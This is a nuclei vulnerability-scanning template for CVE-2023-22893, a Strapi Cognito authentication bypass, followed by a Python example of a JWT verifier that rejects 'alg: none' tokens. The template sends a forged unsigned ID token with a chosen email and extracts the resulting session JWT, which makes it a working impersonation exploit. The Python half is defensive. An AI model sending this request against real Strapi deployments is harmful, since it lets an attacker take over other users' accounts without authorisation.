id: CVE-2023-22893

info:
  name: Strapi Versions <=4.5.6 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Strapi through 4.5.5 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token that is signed using the 'None' type algorithm to bypass authentication and impersonate any user that uses AWS Cognito for authentication.
  reference:
    - https://www.ghostccamm.com/blog/multi_strapi_vulns
    - https://github.com/strapi/strapi/releases
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-22893
    cwe-id: CWE-287
    epss-score: 0.00337
    epss-percentile: 0.71798
    cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: strapi
    product: strapi
    fofa-query: app="strapi-Headless-CMS"
  tags: cve,cve2023,strapi,authenticated,aws,cognito

variables:
  email: "{{email}}"
  payload: '{"cognito:username":"{{to_lower(rand_text_alpha(10))}}","email":"{{email}}"}'

http:
  - raw:
      - |
        GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"provider":'
          - '"confirmed":'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: token
        json:
          - ".jwt"
# digest: 4a0a004730450221008e94642f070b81b9b91cb223562b771430bf25969203b6a0de14772d165e7ba90220585f5eb4ecf088a6c57c1fc61190a47ba1712adfd87029eade60432b6e6a3d17:922c64590222798bb761d5b6d8e72950
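The weakness the template probes is a verifier that trusts the `alg` field of the token header, so an `id_token` whose header is `{"alg":"none","typ":"JWT"}` and whose signature segment is empty is accepted as if it had been signed by Cognito. The following Python is an added example, not part of the nuclei template and not Strapi's or the Cognito provider's code: it decodes the fixed header segment the template sends, rebuilds the same unsigned token shape purely as test input, and shows a verifier that pins the expected algorithm server-side and checks the signature, so the unsigned token is refused while a correctly signed one passes. The HMAC key, the `HS256` pinning (Cognito issues RS256 in practice) and the claim values are constructed for the demo.

```python
"""Verifier that rejects 'alg: none' tokens. Added example; the secret,
algorithm choice and claims below are constructed, not from any deployment."""
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo key; a real deployment would hold the provider's public key.
DEMO_SECRET = b"demo-hmac-key-not-a-real-cognito-key"
# Pinned in server configuration, never read from the token header.
EXPECTED_ALG = "HS256"

# Fixed header segment from the template's id_token parameter.
TEMPLATE_HEADER_SEGMENT = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0"


def b64url_decode(seg: str) -> bytes:
    """Decode a base64url segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _segments(header: dict, claims: dict) -> str:
    compact = {"separators": (",", ":")}
    return (b64url_encode(json.dumps(header, **compact).encode()) + "."
            + b64url_encode(json.dumps(claims, **compact).encode()))


def build_unsigned_token(claims: dict) -> str:
    """Reproduce the template's input shape (header.payload. with empty
    signature) so the verifier below can be exercised against it."""
    return _segments({"alg": "none", "typ": "JWT"}, claims) + "."


def sign_token(claims: dict, secret: bytes) -> str:
    """Issue a properly signed token; stands in for the identity provider."""
    signing_input = _segments({"alg": EXPECTED_ALG, "typ": "JWT"}, claims)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_id_token(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims only for a well-formed token whose header names the
    pinned algorithm and whose signature verifies; otherwise return None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:  # covers bad base64 and bad JSON
        return None
    # The vulnerable behaviour honours header["alg"]; the fix compares it with
    # the server-side expectation, so "none" (and an empty signature) fail here.
    if not isinstance(header, dict) or header.get("alg") != EXPECTED_ALG or not sig:
        return None
    signing_input = f"{header_b64}.{body_b64}".encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    try:
        claims = json.loads(b64url_decode(body_b64))
    except ValueError:
        return None
    return claims if isinstance(claims, dict) else None


def template_header_alg() -> str:
    """Decode the template's header segment to show what it declares."""
    return json.loads(b64url_decode(TEMPLATE_HEADER_SEGMENT))["alg"]


if __name__ == "__main__":
    # Constructed claims mirroring the template's payload shape.
    claims = {"cognito:username": "demoUser", "email": "user@example.invalid"}
    print("template header alg:", template_header_alg())
    print("unsigned token accepted:", verify_id_token(build_unsigned_token(claims), DEMO_SECRET))
    print("signed token accepted:", verify_id_token(sign_token(claims, DEMO_SECRET), DEMO_SECRET))
```

The decisive line is the comparison against `EXPECTED_ALG`: a verifier that instead dispatches on whatever `alg` the token declares will treat `none` as a valid, signature-free algorithm, which is exactly the condition the matchers above detect (a `200` JSON response carrying `provider`, `confirmed` and a fresh `jwt`).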